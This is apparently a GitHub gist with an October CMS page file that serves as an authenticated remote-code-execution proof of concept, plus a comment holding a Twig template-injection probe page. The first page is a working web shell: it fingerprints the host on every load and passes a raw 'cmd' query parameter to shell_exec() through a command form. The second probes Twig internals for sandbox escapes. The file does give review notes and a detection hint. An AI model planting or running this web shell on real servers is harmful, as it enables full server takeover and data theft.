@RajChowdhury240
Created January 19, 2026 23:43
CMS_SAFE_MODE = off

rce-proof.htm

title = "RCE Proof of Concept"
url = "/rce-proof"
layout = "default"
==
<?php
/**
 * October CMS page life-cycle hook for rce-proof.htm; runs before the markup section renders.
 *
 * Populates the Twig variables the markup below reads. `whoami`, `pwd`, `php_version`
 * and `server_info` are host fingerprint values gathered on every request. `cmd_result`
 * is set only when a `cmd` query parameter is present and holds the combined
 * stdout/stderr of that parameter handed, unmodified and unescaped, to shell_exec().
 *
 * The PHP section of a page is only compiled when CMS_SAFE_MODE is off (the page's own
 * notes: "CMS_SAFE_MODE=false (allows PHP execution)"); leaving safe mode enabled is
 * the configuration-level mitigation for this whole class of page. Creating the page
 * needs backend admin access, but once it exists the /rce-proof URL is an ordinary
 * frontend page — presumably reachable without further authentication; confirm
 * against the layout/access rules of the target install.
 */
function onStart()
{
    // Auto-executed on every page load; stderr is folded into the captured output.
    $this['whoami'] = shell_exec('whoami 2>&1');
    $this['pwd'] = getcwd();
    $this['php_version'] = phpversion();
    $this['server_info'] = php_uname();

    // Deliberate command-injection demonstration: the raw query-string value is
    // concatenated straight into the command line with no validation and no
    // escapeshellarg(). Detection hint: look for CMS page files whose PHP section
    // references $_GET/$_POST together with shell_exec/exec/system/passthru.
    if (isset($_GET['cmd'])) {
        $this['cmd_result'] = shell_exec($_GET['cmd'] . ' 2>&1');
    }
}
?>
==
{# Markup section of rce-proof.htm: renders the variables set in onStart() above. #}
<div class="container mt-5">
    <div class="alert alert-danger" role="alert">
        <h2>🔴 AUTHENTICATED RCE VULNERABILITY CONFIRMED</h2>
        <p>This page demonstrates Remote Code Execution through October CMS admin panel.</p>
    </div>

    <div class="card mb-4">
        <div class="card-header bg-dark text-white">
            <h3>System Information (Auto-Executed)</h3>
        </div>
        <div class="card-body">
            <table class="table">
                <tr>
                    <th>Current User:</th>
                    <td><code>{{ whoami }}</code></td>
                </tr>
                <tr>
                    <th>Working Directory:</th>
                    <td><code>{{ pwd }}</code></td>
                </tr>
                <tr>
                    <th>PHP Version:</th>
                    <td><code>{{ php_version }}</code></td>
                </tr>
                <tr>
                    <th>Server Info:</th>
                    <td><code>{{ server_info }}</code></td>
                </tr>
            </table>
        </div>
    </div>

    <div class="card">
        <div class="card-header bg-dark text-white">
            <h3>Interactive Command Execution</h3>
        </div>
        <div class="card-body">
            <form method="get" class="mb-3">
                <div class="input-group mb-3">
                    {# NOTE(review): _GET.cmd is reflected into an attribute and cmd_result (raw
                       shell output) into a <pre>. Whether either is HTML-escaped depends on the
                       Twig environment's autoescape setting for this install — confirm; if it
                       is off, the page is a reflected-XSS sink in addition to the RCE it documents. #}
                    <input type="text" name="cmd" class="form-control" placeholder="Enter shell command (e.g., id, uname -a, ls -la)" value="{{ _GET.cmd }}" required>
                    <button class="btn btn-danger" type="submit">Execute Command</button>
                </div>
            </form>

            {# cmd_result is only defined when onStart() saw a cmd query parameter. #}
            {% if cmd_result %}
            <div class="alert alert-success">
                <h5>Command Output:</h5>
                <pre class="bg-dark text-white p-3" style="border-radius: 5px;">{{ cmd_result }}</pre>
            </div>
            {% endif %}
        </div>
    </div>

    <div class="mt-4 alert alert-warning">
        <h4>Exploitation Details:</h4>
        <ul>
            <li><strong>Attack Vector:</strong> PHP Code Section in CMS Pages</li>
            <li><strong>Required Access:</strong> Admin authentication to CMS backend</li>
            <li><strong>Configuration:</strong> CMS_SAFE_MODE=false (allows PHP execution)</li>
            <li><strong>Impact:</strong> Full server compromise via arbitrary command execution</li>
        </ul>
    </div>
</div>
@RajChowdhury240
Author

SSTI Bypass

title = "SSTI Bypass Test"
url = "/ssti-bypass"
layout = "default"
==
{# Probe page from the gist comment. It has no PHP section, so it exercises only what the
   Twig environment itself exposes with CMS_SAFE_MODE enabled; each card renders one
   expression so the result can be compared against the expected "not available" outcome. #}
<div class="container mt-5">
    <h1>Twig SSTI Bypass Attempts (Safe Mode Enabled)</h1>

    <div class="card mb-3">
        <div class="card-header">Test 1: Direct Expression</div>
        <div class="card-body">
            <code>{{ 7*7 }}</code> = {{ 7*7 }}
        </div>
    </div>

    <div class="card mb-3">
        <div class="card-header">Test 2: _self.env</div>
        <div class="card-body">
            {% set foobar = 'nothing' %}
            <pre>{{ _self|json_encode }}</pre>
        </div>
    </div>

    <div class="card mb-3">
        <div class="card-header">Test 3: Variable from URL</div>
        <div class="card-body">
            {# NOTE(review): reflects a query parameter into the page body; whether it is
               HTML-escaped depends on the environment's autoescape setting — confirm. #}
            User input: {{ _GET.test }}
        </div>
    </div>

    <div class="card mb-3">
        <div class="card-header">Test 4: app object</div>
        <div class="card-body">
            {% if app is defined %}
                <pre>App object exists: {{ app|keys|join(', ') }}</pre>
            {% else %}
                App object not available
            {% endif %}
        </div>
    </div>

    <div class="card mb-3">
        <div class="card-header">Test 5: this object introspection</div>
        <div class="card-body">
            {% if this is defined %}
                This object type: {{ this|json_encode }}
            {% else %}
                This object not available
            {% endif %}
        </div>
    </div>
</div>
